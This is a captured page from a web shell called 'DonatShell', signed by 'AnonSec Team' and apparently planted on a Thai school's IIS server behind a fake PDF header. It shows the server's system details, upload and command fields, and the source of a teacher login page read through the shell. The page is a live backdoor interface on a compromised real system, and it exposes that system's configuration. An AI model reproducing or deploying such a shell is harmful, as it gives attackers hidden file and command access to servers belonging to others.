%PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµù Õ5sLOšuY Donat Was Here
DonatShell
Server IP : www.kowitt.ac.th  /  Your IP : 216.73.216.118
Web Server : Microsoft-IIS/7.5
System : Windows NT SERVER02 6.1 build 7601 (Windows Server 2008 R2 Standard Edition Service Pack 1) i586
User : IUSR ( 0)
PHP Version : 5.6.31
Disable Function : NONE
MySQL : ON  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  C:/BK/wwwroot/mis/teacher/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME SHELL ]     

Current File : C:/BK/wwwroot/mis/teacher/index.php
<?php
    session_start();
    session_destroy();
?>

<!doctype html>
<html lang="en">
  <head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
    <meta name="description" content="">
    <meta name="author" content="">
    <link rel="icon" href="https://getbootstrap.com/docs/4.1/examples/sign-in/favicon.ico">

    <title>Signin to MS Teacher</title>

    <!-- Bootstrap core CSS -->
    <link href="https://getbootstrap.com/docs/4.1/dist/css/bootstrap.min.css" rel="stylesheet">

    <!-- Custom styles for this template -->
    <link href="../../admin/signin.css" rel="stylesheet">
    <script src="https://unpkg.com/sweetalert/dist/sweetalert.min.js"></script>
    <style>
body {
    background-color: #adf2fc;
}
</style>

  </head>
  
  <body class="text-center">
  <?PHP
    if($_GET['Authen']=="NO") {
        echo "<script>swal('Warning', 'ไม่สามารถเข้าสู่ระบบได้ กรุณาตรวจสอบรหัสผู้ใช้และรหัสผ่านอีกครั้ง', 'warning');</script>";
    }
  ?>
    <form class="form-signin" action="checkuser.php"  method="post">
      <img class="mb-4" src="../../img/logo-kowit.png" alt="" width="128" height="128">
      <h1 class="h3 mb-3 font-weight-normal">MIS Teacher</h1>
      <label for="inputEmail" class="sr-only">Email address</label>
      <input type="text" id="IDTeacher" name="IDTeacher" class="form-control" placeholder="IDTeacher" required autofocus>
      <label for="inputPassword" class="sr-only">Password</label>
      <input type="password" id="TeacherPassword" name="TeacherPassword" class="form-control" placeholder="Password" required>
      <div class="checkbox mb-3">
        <label>
          <input type="checkbox" value="remember-me"> Remember me
        </label>
      </div>
      <button class="btn btn-lg btn-primary btn-block" type="submit">Sign in</button>
      <p class="mt-5 mb-3 text-muted">&copy; 2017-2018</p>
    </form>
  </body>
</html>

Anon7 - 2022
AnonSec Team